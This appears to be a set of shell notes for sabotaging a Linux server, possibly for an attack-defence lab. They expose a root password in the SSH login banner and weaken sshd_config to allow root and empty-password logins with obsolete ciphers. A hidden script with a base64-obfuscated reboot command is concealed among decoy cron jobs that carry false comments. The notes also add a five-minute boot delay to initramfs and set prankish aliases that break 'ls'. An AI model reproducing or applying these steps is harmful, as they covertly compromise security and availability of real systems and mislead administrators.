#Creating the banner
nano /etc/messagebeforelogin.net

#Text for the banner
Unauthorized access to this system is prohibited.
All activity is monitored and recorded.

If you have issues with login or to run commands just use the root account!
Here is the password for it: changeme

#Change the file permissions
chmod 444 /etc/messagebeforelogin.net


#Change the sshd_config
nano /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes
PermitEmptyPasswords yes

AllowAgentForwarding yes
AllowTcpForwarding yes

X11Forwarding yes

Banner /etc/messagebeforelogin.net

Protocol "1,2"
Ciphers 3des-cbc
MACs hmac-md5,hmac-sha1


#To apply the settings
sudo systemctl restart sshd

#########################################


#create hidden directory and the script file
sudo mkdir -p /usr/local/.hidden
sudo nano /usr/local/.hidden/dosim.sh

#Text for dosim.sh file
#!/bin/bash
sleep $((600 + RANDOM % 300))
eval "$(echo 'L3NiaW4vc2h1dGRvd24gLXIgbm93' | base64 -d)"

chmod 500 /usr/local/.hidden/dosim.sh


sudo crontab -e
#here we need to choose a text editor from the options 1- nano

#fake jobs with the hidden script
* * * * * /bin/true                               # Check for system updates every minute
*/2 * * * * /bin/echo "Running task" > /dev/null  # Sync backup data every 2 minutes
*/3 * * * * /usr/bin/printf ""                    # Clean temp directory every 3 minutes
*/4 * * * * /bin/date > /dev/null 2>&1            # Send heartbeat to monitoring server every 4 minutes
*/5 * * * * :                                     # Rotate logs every 5 minutes
*/6 * * * * /usr/bin/touch /tmp/.hiddenfile       # Generate encryption keys every 6 minutes
*/7 * * * * /bin/echo "Hello world" > /dev/null   # Ping remote server every 7 minutes
*/8 * * * * /usr/bin/uptime > /dev/null 2>&1      # Report system load to dashboard every 8 minutes
*/9 * * * * /usr/bin/whoami > /dev/null 2>&1      # Check logged-in users every 9 minutes
*/10 * * * * /bin/cat /dev/null > /dev/null       # Compress logs every 10 minutes
*/1 * * * * /usr/local/.hidden/dosim.sh > /dev/null 2>&1  # Network interface health check
0 */1 * * * /bin/echo "Hourly job" > /dev/null    # Perform hourly database backup
5 */2 * * * /bin/false                            # Check for failed services every 2 hours
10 */3 * * * /bin/pwd > /dev/null 2>&1            # Validate file integrity every 3 hours
15 */4 * * * /usr/bin/id > /dev/null 2>&1         # Ensure root privileges are maintained every 4 hours
20 */5 * * * /usr/bin/cal > /dev/null 2>&1        # Sync with NTP server every 5 hours
25 */6 * * * /usr/bin/yes > /dev/null 2>&1        # Ensure system consistency every 6 hours
30 2 * * * /usr/bin/echo "System check" > /dev/null  # Perform full system scan at 2:30 AM
45 3 * * * /bin/sleep 1                           # Pause monitoring services at 3:45 AM
0 4 * * 0 /usr/bin/head /dev/null > /dev/null 2>&1 # Weekly malware scan every Sunday at 4:00 AM
30 5 * * 1 /bin/echo "Monday task" > /dev/null    # Refresh web cache every Monday at 5:30 AM
45 6 * * 2 /usr/bin/tail /dev/null > /dev/null 2>&1 # Clean old logs every Tuesday at 6:45 AM
*/11 * * * * /bin/sh -c 'sleep 1 && echo Done' > /dev/null  # Disk usage optimization every 11 minutes
*/12 * * * * /usr/bin/uptime | /bin/true          # Analyze CPU performance every 12 minutes
*/13 * * * * /bin/hostname > /dev/null 2>&1       # Update DNS records every 13 minutes
*/14 * * * * /usr/bin/env > /dev/null 2>&1        # Environment variable refresh every 14 minutes
*/15 * * * * /usr/bin/touch /tmp/noisyjob         # Trigger scheduled patch update every 15 minutes


#Make longer the boot time
sudo nano /usr/share/initramfs-tools/scripts/init-premount/delay

#!/bin/sh
PREREQ=""
prereqs() {
   echo "$PREREQ"
}

case "$1" in
   prereqs)
      prereqs
      exit 0
      ;;
esac

sleep 300 

sudo chmod +x /usr/share/initramfs-tools/scripts/init-premount/delay
sudo update-initramfs -u


#edit the files which contains aliases 
sudo nano .bashrc

#tricks for the end
alias la='ls'
alias ll='ls'
alias ls='/bin/bash -c "echo U BEEN PWND!"'
alias nano='vi'

#to apply the changes
exec bash
